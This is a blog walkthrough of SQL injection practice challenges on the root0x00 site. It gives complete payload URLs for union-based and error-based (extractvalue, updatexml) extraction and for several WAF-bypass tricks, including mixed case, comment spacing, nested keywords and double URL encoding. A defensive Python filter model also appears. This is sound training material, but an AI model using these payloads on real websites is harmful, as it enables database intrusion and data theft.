Root0x00 SQL Injection.

Sampath Pendurthi
6 min read · Jan 14, 2021

Hello everyone, let’s solve some SQL injection challenges from the root0x00 altervista site. Click here to solve along with me. If you are new to SQL injection, please read my blog before reading this.

We’ll be solving them manually without using sqlmap. So let’s begin….

Integer Based SQL INJECTION:

First things first, this one is very easy to solve. Let’s assume the query is:

“SELECT * FROM users WHERE id=1”

So there is no single quote or double quote in the query, and therefore no need to add one to our payload.

So there are five columns in the table. Now let’s find the vulnerable columns.

The 2nd column is vulnerable, so let’s print database(), user() and version():

http://root0x00.altervista.org/sqli/integer.php?id=-1%20union%20select%201,concat(0x0a,database(),0x0a,user(),0x0a,version()),3,4,5--++

So, it’s done…

String Based SQL INJECTION:

In string based injection, the id parameter is placed between single or double quotes.

So let’s assume the query is:

“SELECT * FROM users WHERE id="1"”

Now let’s find out the number of columns in the table.

OK, we have 5 columns in the table. Now let’s find the vulnerable column.

OK, now let’s find the database, user and version:

http://root0x00.altervista.org/sqli/string.php?id=-1%27%20union%20select%201,concat(0x0a,database(),0x0a,user(),0x0a,version()),3,4,5--+

OK, done….

String Based with Open Brackets SQL INJECTION:

In this one, the id parameter is placed between open brackets and double quotes.

Observe the image to understand it. So let’s assume the query is:

SELECT * FROM users WHERE id=(“1”)

Here a null byte is used to avoid the error.

OK, as usual there are 5 columns. From here on I’ll skip this step, so let’s find the vulnerable column.

OK, we got the vulnerable column, so, just as above, find out the database, user and version.

OK, it’s done…

Basic WAF Bypassing SQL Injection:

If a website is using a WAF, it will block requests that contain the ‘union’ or ‘select’ keywords. So let’s go. Remember, it’s a string type SQL injection.

So you can observe that it is blocking our request.

http://root0x00.altervista.org/sqli/simple.php?id=1%27%20and%20false%20UnIoN%200SeLeCt%201,2,3,4,5--++

OK, we have successfully bypassed the firewall. From the above we can see that the WAF is blocking only the ‘select’ and ‘union’ words, so I’ve changed them to random uppercase and the firewall is bypassed.

Next, find out the database, user and version.

It’s done.

WAF Bypassing SQL INJECTION (LEVEL:EASY~):

In this case the union and select keywords are placed inside comments to bypass the firewall.

http://root0x00.altervista.org/sqli/waf2.php?id=10%27%20/*!union*/%20/*!select*/%201,2,3,4,5--+

OK, it’s bypassed. Don’t forget to extract the database name, user and version.

OK, done…..

WAF Bypassing SQL INJECTION (LEVEL:EASY~MEDIUM):

OK, in this level we’ll see how the firewall removes the words that are present in the URL.

So observe the above error. It says there is an error just before the 1st column. This error showed up because union and select were removed from the URL. To confirm that, let’s add something to union to produce an error at union.

So, look at this: an error is produced at the union statement, but select is missing. From this error we came to know that this WAF is removing the keywords from the request URL. So to bypass this kind of WAF we’ll add union in the middle of another union. The WAF will search for union and remove it, but the remaining text will reach the server and give us the vulnerable column.

http://root0x00.altervista.org/sqli/level.php?id=10%27%20uniUNIONon%20selSELECTect%201,2,3,4,5--++

OK, we got the vulnerable column. So do your stuff here.

WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~MEDIUM):

So, this level is also removing the keywords from the request URL and, in addition, it also removes the white spaces.

To add white space between the words I just inserted a comment.

http://root0x00.altervista.org/sqli/level1.php?id=10%27%20uniUNIONon/**/selSELECTect/**/1,2,3,4,5;%00

Now find the database, user and version…

Done…….

WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~HARD):

This challenge f**ked me very badly. It took me almost two days to complete it. While solving this challenge I’ve learned many things. So let’s begin.

First, let’s find out which keywords the WAF is blocking.

OK, union and select are the two words it’s blocking. So let’s find a way to bypass it.

To bypass it we have to understand it. First I tried encoding union and select in URL format. But the server decodes the request first and then blocks it, because the union and select keywords are there after decoding. So for two days I tried many different things to bypass it. But at last I came to know that the server is filtering only one time. What if I encode it twice? So I encoded the union and select keywords twice in URL format and it is bypassed…

http://root0x00.altervista.org/sqli/level1.5.php?id=10%27%20%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%20%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%201,2,3,4,5--++

OK, don’t forget to find the database, user and version..

HARD LEVEL done…

WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~HARD):

It’s a very easy level. First let’s see what the WAF is filtering.

As we did above, the WAF is removing keywords like select and union, so I’ve added UNION and SELECT in the middle of union and select. It is also removing the white spaces, and if we leave spaces in the payload it will produce an error, so we’ll use comments in their place.

http://root0x00.altervista.org/sqli/level2.php?id=10%27/**/unUNIONion/**/selSELECTect/**/1,2,3,4,5;%00
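The keyword-stripping levels above (level.php, level1.php, level2.php) and the double-encoding level (level1.5.php) fail for the same two reasons: the filter deletes keywords instead of rejecting the request, and it inspects the parameter after a single URL decode. The added Python example below is my own, not code from the challenge site: it models that sanitizing filter, shows what the database ends up seeing after the application's own decode, and contrasts it with a check that canonicalizes first (decode to a fixed point, strip comments and NUL bytes) and blocks on keyword presence. The payload strings are constructed from the write-up's URLs.

```python
import re
from urllib.parse import unquote

# Keywords the write-up's WAF levels filter, and MySQL inline comments
# (/**/ and the /*!...*/ form) that the payloads use in place of spaces.
KEYWORD_RE = re.compile(r"union|select", re.IGNORECASE)
COMMENT_RE = re.compile(r"/\*!?.*?\*/", re.DOTALL)
UNION_SELECT_RE = re.compile(r"\bunion\b.*\bselect\b")

def sanitizing_waf(raw_id: str) -> str:
    """Models the filter the write-up defeats: the web server URL-decodes the
    parameter once, every 'union'/'select' is deleted in a single left-to-right
    pass, and whatever is left is forwarded to the application."""
    return KEYWORD_RE.sub("", unquote(raw_id))

def canonicalize(value: str) -> str:
    """Canonical form for inspection: URL-decode until nothing changes (so
    %2575 -> %75 -> u), drop NUL bytes, turn comments into spaces, collapse
    whitespace and fold case."""
    previous = None
    while value != previous:
        previous, value = value, unquote(value)
    value = value.replace("\x00", "")
    value = COMMENT_RE.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def reaches_db_as_union_select(raw_id: str) -> bool:
    """True when the string the database finally sees (after the sanitizing
    WAF and the application's own decoding) still contains UNION ... SELECT."""
    return UNION_SELECT_RE.search(canonicalize(sanitizing_waf(raw_id))) is not None

def detecting_waf_blocks(raw_id: str) -> bool:
    """Hardened check: inspect the canonical form and reject on keyword
    presence instead of deleting keywords, so nested or double-encoded
    variants cannot reassemble after the filter."""
    return KEYWORD_RE.search(canonicalize(raw_id)) is not None

# Constructed inputs in raw query-string form, modelled on the write-up's
# level1.php and level1.5.php payloads, plus a benign id.
NESTED = "10%27%20uniUNIONon/**/selSELECTect/**/1,2,3,4,5;%00"
DOUBLE = ("10%27%20%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%20"
          "%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%201,2,3,4,5--++")
BENIGN = "10"

if __name__ == "__main__":
    for label, raw in (("nested", NESTED), ("double", DOUBLE), ("benign", BENIGN)):
        print(f"{label}: sanitizer leaks={reaches_db_as_union_select(raw)} "
              f"hardened blocks={detecting_waf_blocks(raw)}")
```

Canonicalize-then-block is defence in depth only; the root fix for every level on this page is a parameterized query, so that the id value is never part of the SQL text.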

Done….

XPATH SQL INJECTION (LEVEL:EASY):

So this one is different from what we did before. In such cases we’ll use extractvalue to get the database. We use this technique when there are no vulnerable columns available or when the WAF is blocking the union keyword. So let’s gooooo……

http://root0x00.altervista.org/sqli/xpath.php?id=1%27%20%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat(0x0a,database(),%27::%27,user(),%27::%27,version()))))--++

XPATH SQL INJECTION 2 (LEVEL:EASY):

Here extractvalue is blocked by the WAF, so we’ll use the updatexml method to extract the database. These methods are also called query SQL injection or double query SQL injection.

http://root0x00.altervista.org/sqli/xpath2.php?id=1%27%20and%20updatexml(null,concat(0x0a,(select%20database())),null)--++

OK, done…. :)

Error Based SQL INJECTION:

Same as the XPATH SQL injection: you can perform either xpath injection 1 or xpath injection 2.

Boolean based blind SQL injection and time based SQL injection are covered in the next writeup, because they are very long and time-taking and this one has already become lengthy. So I’ll make a separate writeup for them.

THANKS…… :)

If everything is OK I’ll make a video on these challenges to explain them in a better way.

Follow for more stuff….

LinkedIN:https://www.linkedin.com/in/sampath-pendurthi/

Instagram:https://www.instagram.com/sampath.pendurthi/

HAPPY HACKING..

PEACE……✌️✌️
